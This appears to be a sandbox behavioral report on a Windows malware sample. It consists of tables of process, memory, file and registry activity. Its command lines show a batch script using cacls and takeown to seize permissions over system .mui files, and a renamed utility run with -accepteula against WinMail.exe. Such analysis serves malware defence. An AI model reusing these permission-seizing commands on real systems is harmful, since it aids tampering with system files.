| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:13:24 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #232: cmd.exe
135
0
| Information | Value |
|---|---|
| ID | #232 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:48, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:14 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7fc |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
334
0x
A38
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000a00000 | 0x00a00000 | 0x049fffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004a00000 | 0x04a00000 | 0x04a1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a00000 | 0x04a00000 | 0x04a0ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004a10000 | 0x04a10000 | 0x04a13fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a20000 | 0x04a20000 | 0x04a21fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a20000 | 0x04a20000 | 0x04a23fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a30000 | 0x04a30000 | 0x04a43fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004a50000 | 0x04a50000 | 0x04a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a90000 | 0x04a90000 | 0x04b8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b90000 | 0x04b90000 | 0x04b93fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004ba0000 | 0x04ba0000 | 0x04ba0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004bb0000 | 0x04bb0000 | 0x04bb1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bc0000 | 0x04bc0000 | 0x04bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c00000 | 0x04c00000 | 0x04c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c60000 | 0x04c60000 | 0x04c6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c70000 | 0x04c70000 | 0x04e2ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04c70000 | 0x04d2dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004d30000 | 0x04d30000 | 0x04e2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e30000 | 0x04e30000 | 0x04f2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f30000 | 0x04f30000 | 0x0502ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05030000 | 0x05366fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ed20000 | 0x7ed20000 | 0x7ee1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ee20000 | 0x7ee20000 | 0x7ee42fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ee44000 | 0x7ee44000 | 0x7ee44fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee47000 | 0x7ee47000 | 0x7ee47fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee4a000 | 0x7ee4a000 | 0x7ee4cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee4d000 | 0x7ee4d000 | 0x7ee4ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (75)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
10 | |
| Get Info | - | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
35 | |
| Open | STD_INPUT_HANDLE | - |
|
3 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 91 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 70 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 168, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x5d8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xecc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (31)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
8 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
2 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #234: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #234 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:51, Reason: Child Process |
| Unmonitor | End Time: 00:03:58, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x864 |
| Parent PID | 0x3e4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
950
0x
56C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000f20000 | 0x00f20000 | 0x00f3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000f20000 | 0x00f20000 | 0x00f2ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000f30000 | 0x00f30000 | 0x00f33fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f40000 | 0x00f40000 | 0x00f41fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f40000 | 0x00f40000 | 0x00f43fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000f50000 | 0x00f50000 | 0x00f63fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000f70000 | 0x00f70000 | 0x00faffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000fb0000 | 0x00fb0000 | 0x00feffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ff0000 | 0x00ff0000 | 0x00ff3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001000000 | 0x01000000 | 0x01000fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001010000 | 0x01010000 | 0x01011fff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x01020000 | 0x01021fff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000005050000 | 0x05050000 | 0x0508ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005090000 | 0x05090000 | 0x0509ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050a0000 | 0x050a0000 | 0x051effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050a0000 | 0x050a0000 | 0x050dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050f0000 | 0x050f0000 | 0x051effff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x051f0000 | 0x052adfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000052b0000 | 0x052b0000 | 0x052effff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x052f0000 | 0x05626fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x743a0000 | 0x743c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e4a0000 | 0x7e4a0000 | 0x7e59ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e5a0000 | 0x7e5a0000 | 0x7e5c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e5c5000 | 0x7e5c5000 | 0x7e5c7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e5c8000 | 0x7e5c8000 | 0x7e5c8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e5ca000 | 0x7e5ca000 | 0x7e5ccfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e5cd000 | 0x7e5cd000 | 0x7e5cdfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #235: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #235 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula "WinMail.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:52, Reason: Child Process |
| Unmonitor | End Time: 00:03:57, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf08 |
| Parent PID | 0xff8 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
8EC
0x
CF4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x003d0000 | 0x003f9fff | Memory Mapped File | r |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x004bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x006dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006e0000 | 0x006e0000 | 0x00867fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000870000 | 0x00870000 | 0x009f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a00000 | 0x00a00000 | 0x01dfffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001e00000 | 0x01e00000 | 0x01feffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
